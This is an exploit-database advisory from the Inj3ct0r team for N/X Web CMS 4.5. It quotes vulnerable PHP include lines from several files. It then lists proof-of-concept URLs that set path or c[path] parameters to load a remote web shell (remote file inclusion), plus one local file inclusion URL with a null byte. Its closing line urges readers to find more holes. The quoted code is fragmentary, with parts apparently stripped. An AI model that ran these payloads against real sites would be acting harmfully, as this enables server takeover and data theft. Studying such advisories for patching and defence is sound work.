N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability =================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ######################################## 1 0 I'm eidelweiss member from Inj3ct0r Team 1 1 ######################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Work If: magic_quotes_gpc & magic_quotes_runtime Disable Download: http://sourceforge.net/projects/nxwcms/files/0.%20N_X%20WCMS%204.5%20System/4.5%20Release%201/nx45.zip/download Author: eidelweiss Contact: eidelweiss[at]cyberservices.com Thank`s: r0073r & 0x1D (inj3ct0r) , JosS , exploit-db team , [D]eal [C]yber sp3x (securityreason) get-well brother Special To: m4rc0 & LeQhi (thank`s so much brother , respect to you) Advisories: http://eidelweiss-advisories.blogspot.com/2010/04/nx-web-cms-nx-wcms-45-multiple.html ======================================================================== Description: N/X 4.0 is a powerful content management system for the web. N/X CMS is focused on delivering content in many powerful ways. Its functions and content-types can be extended with the plugin-interface and a very very powerful API. ======================================================================== -=[ VULN C0de ]=- ************************************************** [-] nx_path/www/text.php ************************************************** path."inc/header.php"; // Start of individual template echo $cds->content->get("Headline"); br(); echo $cds->content->get("Body"); include $cds->path."inc/footer.php"; require_once "nxfooter.inc.php"; ?> ************************************************** [-] nx_path/www/article.php ************************************************** path."inc/header.php"; // get the id of the article from the request // do type validation echo $cds->cluster->draw($article); br(); br(); // link back to the page where the article was called echo $cds->content->get("Backlink Title"); require_once $cds->path."inc/footer.php"; require_once "nxfooter.inc.php"; ?> ************************************************** [-] nx_path/www/article_overview.php ************************************************** path."inc/header.php"; // line 3 ***** require_once $cds->path."inc/footer.php"; // line 42 require_once "nxfooter.inc.php"; ?> ************************************************** [-] nx_path/www/sitemap.php ************************************************** path."inc/header.php"; // line 3 ***** include $cds->path."inc/footer.php"; // line 56 require_once "nxfooter.inc.php"; ?> ************************************************** [-] nx_path/www/pagelayout.inc.php ************************************************** ************************************************** [-] nx_path/www/nxheader.inc.php ************************************************** $page)); } require_once $c["path"]."ext/jpcache/jpcache.php"; // line 34 ************************************************** [-] nx_path/cms/api/xml/lib.inc.php ************************************************** ************************************************** [-] nx_path/cms/api/parser/lib.inc.php ************************************************** ************************************************** [-] nx_path/cms/api/cms/lib.inc.php ************************************************** ======================================================================== -=[ P0C RFI ]=- http://127.0.0.1/[NX_PATH]/www/text.php?path= [inj3ct0r sh3ll] http://127.0.0.1/[NX_PATH]/www/article.php?path= [inj3ct0r sh3ll] http://127.0.0.1/[NX_PATH]/www/article_overview.php?path= [inj3ct0r sh3ll] http://127.0.0.1/[NX_PATH]/www/sitemap.php?path= [inj3ct0r sh3ll] http://127.0.0.1/[NX_PATH]/www/pagelayout.inc.php?c[path]= [inj3ct0r sh3ll] http://127.0.0.1/[NX_PATH]/www/nxheader.inc.php?c[path]= [inj3ct0r sh3ll] http://127.0.0.1/[NX_PATH]/cms/api/xml/lib.inc.php?c[path]= [inj3ct0r sh3ll] http://127.0.0.1/[NX_PATH]/cms/api/parser/lib.inc.php?c[path]= [inj3ct0r sh3ll] http://127.0.0.1/[NX_PATH]/cms/api/cms/lib.inc.php?c[path]= [inj3ct0r sh3ll] etc , etc ,etc -=[ P0C LFI ]=- http://127.0.0.1/[NX_PATH]/www/nxheader.inc.php?page= [LFI]%00 etc , etc , etc, [*] So many vulnerability here , use your skill and play your imagination [*] [*] vuln in NX_path/wwwdev Directory i thing same with vuln in NX_path/www that`s why i don`t put here [*] =========================| -=[ E0F ]=- |=================================